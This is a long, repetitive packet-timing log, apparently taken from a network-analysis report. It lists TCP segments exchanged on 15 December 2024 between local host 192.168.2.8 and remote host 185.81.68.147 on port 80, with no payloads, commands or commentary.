                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.771348953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.771420956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.772093058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.772197008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.772267103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.772910118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.773025036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.773096085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.773749113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.773864985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.773936987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.774610996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.776829958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.776846886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.776859999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.776874065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.776887894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.776926994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.776952982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.777055979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.777136087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.777204037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.777926922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.778031111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.778101921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.778748989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.778852940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.778923035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.779568911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.779684067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.779759884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.780433893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.780589104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.780663967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.781255007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.781357050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.781426907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.782103062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.782237053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.782306910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.782974958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.783034086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.783102036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.783751011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.783854961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.783960104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.784596920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.784692049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.784765005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.785432100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.785533905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.785607100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.786386013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.786437035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.786525011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.787152052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.787380934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.787472010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.788472891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.788528919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.788616896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.789071083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.789120913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.789202929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.789736986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.789860010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.789941072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.790530920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.790632010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.790702105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.791337967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.802562952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.802666903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.802721024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.802930117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.802984953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.803018093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.803558111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.803616047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.803626060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.804395914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.804451942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.804493904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.805238962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.805291891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.805336952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.806075096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.806128025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.806159019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.806871891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.806924105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.806946993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.807744980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.807809114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.807847023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.808568001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.808618069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.808702946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.809417963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.809475899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.809518099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.852751970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.948980093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.949098110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.949225903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.949268103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.949440002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.949486971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.949958086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.950126886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.950171947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.950903893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.951019049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.951066971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.951819897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.951936960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.951992989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.952555895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.952601910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.952686071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.953346968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.953422070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.953504086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.954135895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.954241037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.954328060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.955034018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.955173969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.955257893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.955827951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.955928087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.956007004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.956666946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.956742048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.956814051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.957525969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.957765102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.958019018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.958345890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.958422899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.958498001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.959139109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.959258080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.959347963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.959978104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.960120916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.960235119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.960805893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.960927010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.961179972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.961647034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.961755991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.961838961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.962532043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.962639093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.962721109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.963324070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.963433027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.963481903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.964148998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.964277983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.964322090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.964972019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.965090990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.965181112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.965852022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.965915918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.965997934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.966660023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.966766119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.966846943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.967530966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.967643023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.967722893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.968355894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.968436003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.968517065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.969157934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.969265938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.969347954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.969983101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.970119953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.970201969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.970854998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.970922947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.971012115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.971658945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.971791029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.971884012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.972470999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.972592115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.972670078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.973311901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.973361969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.973443031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.974159956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.974273920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.974355936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.975094080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.975181103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.975263119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.975819111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.975922108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.976041079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.976649046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.976771116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.976850986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.977555990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.977683067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.977761984 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.978411913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.978486061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.978537083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.979226112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.979418039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.979504108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.980074883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.980170012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.980257034 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.980874062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.980994940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.981072903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.981710911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.981827974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.981906891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.982635975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.982733011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.982816935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.983587027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.983730078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.983783960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.984371901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.994884014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.994976997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.995170116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.995299101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.995301008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.995349884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.995971918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.996021032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.996099949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.996833086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.996882915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.996922970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.997643948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.997701883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.997706890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.998845100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.998922110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.998929024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.999763966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.999835968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:43.999885082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.000576019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.000643015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.000662088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.001197100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.001269102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.001277924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.002067089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.002124071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.002139091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.055880070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.141120911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.141215086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.141335964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.141449928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.141542912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.141594887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.142308950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.142591953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.142632008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.142748117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.143394947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.143452883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.143539906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.144224882 CET8049709185.81.68.147192.168.2.8
